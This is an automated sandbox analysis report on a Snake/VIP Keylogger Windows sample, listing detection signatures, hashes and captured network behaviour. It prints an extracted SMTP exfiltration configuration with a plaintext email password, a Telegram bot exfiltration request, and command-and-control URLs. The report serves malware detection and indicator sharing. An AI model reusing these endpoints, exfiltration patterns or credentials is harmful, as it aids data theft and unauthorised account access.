Windows Analysis Report
1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe

Overview

General Information

Sample name: 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe
Analysis ID: 1520417
MD5: b046211fe3f420a9ceb7663a560ece96
SHA1: 785a1cff39f2a75cbfffed3d718e9e026b3c80a1
SHA256: 96134c810750cc56e372551f8070f06aee80ae0cc8eeac983502d6b8f66c77df
Tags: base64-decodedexeuser-abuse_ch
Infos:

Detection

Snake Keylogger, VIP Keylogger
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Yara detected Snake Keylogger
Yara detected Telegram RAT
Yara detected VIP Keylogger
AI detected suspicious sample
Machine Learning detection for sample
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Yara detected Generic Downloader
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains long sleeps (>= 3 min)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
One or more processes crash
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Yara signature match

Classification

Name Description Attribution Blogpost URLs Link
404 Keylogger, Snake Keylogger Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

AV Detection
barindex
Antivirus / Scanner detection for submitted sample
Source: 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe Avira: detected
Antivirus detection for URL or domain
Source: http://aborters.duckdns.org:8081 URL Reputation: Label: malware
Source: http://anotherarmy.dns.army:8081 URL Reputation: Label: malware
Found malware configuration
Source: 00000000.00000002.1510453566.0000000002A81000.00000004.00000800.00020000.00000000.sdmp Malware Configuration Extractor: Snake Keylogger {"Exfil Mode": "SMTP", "Username": "info@lamela.si", "Password": "2014viks5961lamela", "Host": "mail.lamela.si", "Port": "587", "Version": "4.4"}
Source: 0.0.1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe.700000.0.unpack Malware Configuration Extractor: VIP Keylogger {"Exfil Mode": "SMTP", "Email ID": "info@lamela.si", "Password": "2014viks5961lamela", "Host": "mail.lamela.si", "Port": "587", "Version": "4.4"}
Multi AV Scanner detection for submitted file
Source: 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe ReversingLabs: Detection: 65%
AI detected suspicious sample
Source: Submited Sample Integrated Neural Analysis Model: Matched 100.0% probability
Machine Learning detection for sample
Source: 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe Joe Sandbox ML: detected

Location Tracking
barindex
Tries to detect the country of the analysis system (by using the IP)
Source: unknown DNS query: name: reallyfreegeoip.org
Uses 32bit PE files
Source: 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Uses insecure TLS / SSL version for HTTPS connection
Source: unknown HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.7:49700 version: TLS 1.0
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:49716 version: TLS 1.2
Source: 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: C:\Windows\mscorlib.pdbpdblib.pdb source: 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe, 00000000.00000002.1513483890.0000000006248000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Core.pdbP source: WER1929.tmp.dmp.12.dr
Source: Binary string: System.Xml.ni.pdb source: WER1929.tmp.dmp.12.dr
Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb source: 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe, 00000000.00000002.1513483890.0000000006211000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.ni.pdbRSDS source: WER1929.tmp.dmp.12.dr
Source: Binary string: System.Configuration.ni.pdb source: WER1929.tmp.dmp.12.dr
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe, 00000000.00000002.1513483890.0000000006211000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Configuration.pdbh source: WER1929.tmp.dmp.12.dr
Source: Binary string: mscorlib.ni.pdbRSDS source: WER1929.tmp.dmp.12.dr
Source: Binary string: System.Security.pdb source: WER1929.tmp.dmp.12.dr
Source: Binary string: System.Configuration.pdb source: WER1929.tmp.dmp.12.dr
Source: Binary string: System.pdbMZ source: WER1929.tmp.dmp.12.dr
Source: Binary string: System.Xml.pdb source: WER1929.tmp.dmp.12.dr
Source: Binary string: System.pdb source: WER1929.tmp.dmp.12.dr
Source: Binary string: System.Xml.ni.pdbRSDS# source: WER1929.tmp.dmp.12.dr
Source: Binary string: System.Core.ni.pdb source: WER1929.tmp.dmp.12.dr
Source: Binary string: Microsoft.VisualBasic.pdb source: WER1929.tmp.dmp.12.dr
Source: Binary string: System.Windows.Forms.pdb source: WER1929.tmp.dmp.12.dr
Source: Binary string: System.Web.Extensions.pdb source: WER1929.tmp.dmp.12.dr
Source: Binary string: mscorlib.pdb source: 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe, 00000000.00000002.1513483890.000000000625D000.00000004.00000020.00020000.00000000.sdmp, WER1929.tmp.dmp.12.dr
Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb source: 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe, 00000000.00000002.1513483890.00000000061DE000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: mscorlib.pdb\t source: WER1929.tmp.dmp.12.dr
Source: Binary string: mscorlib.ni.pdb source: WER1929.tmp.dmp.12.dr
Source: Binary string: \??\C:\Windows\mscorlib.pdb source: 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe, 00000000.00000002.1513483890.0000000006211000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Core.pdb source: WER1929.tmp.dmp.12.dr
Source: Binary string: System.Windows.Forms.pdbSystem.ni.dllp source: WER1929.tmp.dmp.12.dr
Source: Binary string: System.Configuration.ni.pdbRSDScUN source: WER1929.tmp.dmp.12.dr
Source: Binary string: System.ni.pdb source: WER1929.tmp.dmp.12.dr
Source: Binary string: System.Core.ni.pdbRSDS source: WER1929.tmp.dmp.12.dr
Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe Code function: 4x nop then jmp 00ECF8E9h 0_2_00ECF62F
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe Code function: 4x nop then jmp 00ECFD41h 0_2_00ECFA88
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe Code function: 4x nop then jmp 067024C0h 0_2_067020A8
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe Code function: 4x nop then jmp 06701C21h 0_2_06701970
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe Code function: 4x nop then jmp 0670EBF9h 0_2_0670E950
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h 0_2_06700673
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe Code function: 4x nop then jmp 0670F901h 0_2_0670F658
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe Code function: 4x nop then jmp 0670C939h 0_2_0670C690
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe Code function: 4x nop then jmp 0670DA99h 0_2_0670D7F0
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe Code function: 4x nop then jmp 0670E7A1h 0_2_0670E4F8
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe Code function: 4x nop then jmp 0670C4E1h 0_2_0670C238
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe Code function: 4x nop then jmp 0670F4A9h 0_2_0670F200
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe Code function: 4x nop then jmp 067024C0h 0_2_067023EE
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe Code function: 4x nop then jmp 0670D641h 0_2_0670D398
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h 0_2_06700040
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe Code function: 4x nop then jmp 0670E349h 0_2_0670E0A0
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe Code function: 4x nop then jmp 0670D1E9h 0_2_0670CF40
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe Code function: 4x nop then jmp 0670DEF1h 0_2_0670DC48
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe Code function: 4x nop then jmp 0670C089h 0_2_0670BDE0
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe Code function: 4x nop then jmp 0670F051h 0_2_0670EDA8
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe Code function: 4x nop then jmp 0670CD91h 0_2_0670CAE8
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe Code function: 4x nop then jmp 0670FD59h 0_2_0670FAB0
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h 0_2_06700853

Networking
barindex
Uses the Telegram API (likely for C&C communication)
Source: unknown DNS query: name: api.telegram.org
Yara detected Generic Downloader
Source: Yara match File source: 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe, type: SAMPLE
Source: Yara match File source: 0.0.1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe.700000.0.unpack, type: UNPACKEDPE
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:642294%0D%0ADate%20and%20Time:%2027/09/2024%20/%2015:33:28%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20642294%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 149.154.167.220 149.154.167.220
Source: Joe Sandbox View IP Address: 188.114.97.3 188.114.97.3
Source: Joe Sandbox View IP Address: 188.114.97.3 188.114.97.3
Source: Joe Sandbox View IP Address: 158.101.44.242 158.101.44.242
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: TELEGRAMRU TELEGRAMRU
Source: Joe Sandbox View ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Source: Joe Sandbox View JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
May check the online IP address of the machine
Source: unknown DNS query: name: checkip.dyndns.org
Source: unknown DNS query: name: reallyfreegeoip.org
Suricata IDS alerts with low severity for network traffic
Source: Network traffic Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:49699 -> 158.101.44.242:80
Source: Network traffic Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:49702 -> 158.101.44.242:80
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49703 -> 188.114.97.3:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49701 -> 188.114.97.3:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49705 -> 188.114.97.3:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49713 -> 188.114.97.3:443
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Uses insecure TLS / SSL version for HTTPS connection
Source: unknown HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.7:49700 version: TLS 1.0
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:642294%0D%0ADate%20and%20Time:%2027/09/2024%20/%2015:33:28%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20642294%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic DNS traffic detected: DNS query: checkip.dyndns.org
Source: global traffic DNS traffic detected: DNS query: reallyfreegeoip.org
Source: global traffic DNS traffic detected: DNS query: api.telegram.org
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Fri, 27 Sep 2024 08:47:41 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
Source: 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe String found in binary or memory: http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded
Source: 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe String found in binary or memory: http://aborters.duckdns.org:8081
Source: 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe String found in binary or memory: http://anotherarmy.dns.army:8081
Source: 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe, 00000000.00000002.1510453566.0000000002A81000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://checkip.dyndns.org
Source: 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe, 00000000.00000002.1510453566.0000000002A81000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://checkip.dyndns.org/
Source: 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe String found in binary or memory: http://checkip.dyndns.org/q
Source: 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe, 00000000.00000002.1510453566.0000000002A81000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: Amcache.hve.12.dr String found in binary or memory: http://upx.sf.net
Source: 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe String found in binary or memory: http://varders.kozow.com:8081
Source: 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe, 00000000.00000002.1512044852.0000000003C2F000.00000004.00000800.00020000.00000000.sdmp, 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe, 00000000.00000002.1512044852.0000000003AA1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe, 00000000.00000002.1510453566.0000000002B68000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org
Source: 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe String found in binary or memory: https://api.telegram.org/bot
Source: 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe, 00000000.00000002.1510453566.0000000002B68000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
Source: 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe, 00000000.00000002.1510453566.0000000002B68000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:642294%0D%0ADate%20a
Source: 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe, 00000000.00000002.1512044852.0000000003C2F000.00000004.00000800.00020000.00000000.sdmp, 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe, 00000000.00000002.1512044852.0000000003AA1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe, 00000000.00000002.1512044852.0000000003C2F000.00000004.00000800.00020000.00000000.sdmp, 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe, 00000000.00000002.1512044852.0000000003AA1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe, 00000000.00000002.1512044852.0000000003C2F000.00000004.00000800.00020000.00000000.sdmp, 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe, 00000000.00000002.1512044852.0000000003AA1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe, 00000000.00000002.1510453566.0000000002C17000.00000004.00000800.00020000.00000000.sdmp, 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe, 00000000.00000002.1510453566.0000000002C08000.00000004.00000800.00020000.00000000.sdmp, 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe, 00000000.00000002.1510453566.0000000002C49000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chrome.google.com/webstore?hl=en
Source: 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe, 00000000.00000002.1510453566.0000000002C08000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chrome.google.com/webstore?hl=enXL
Source: 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe, 00000000.00000002.1510453566.0000000002C12000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chrome.google.com/webstore?hl=enlB
Source: 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe, 00000000.00000002.1512044852.0000000003C2F000.00000004.00000800.00020000.00000000.sdmp, 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe, 00000000.00000002.1512044852.0000000003AA1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/ac/?q=
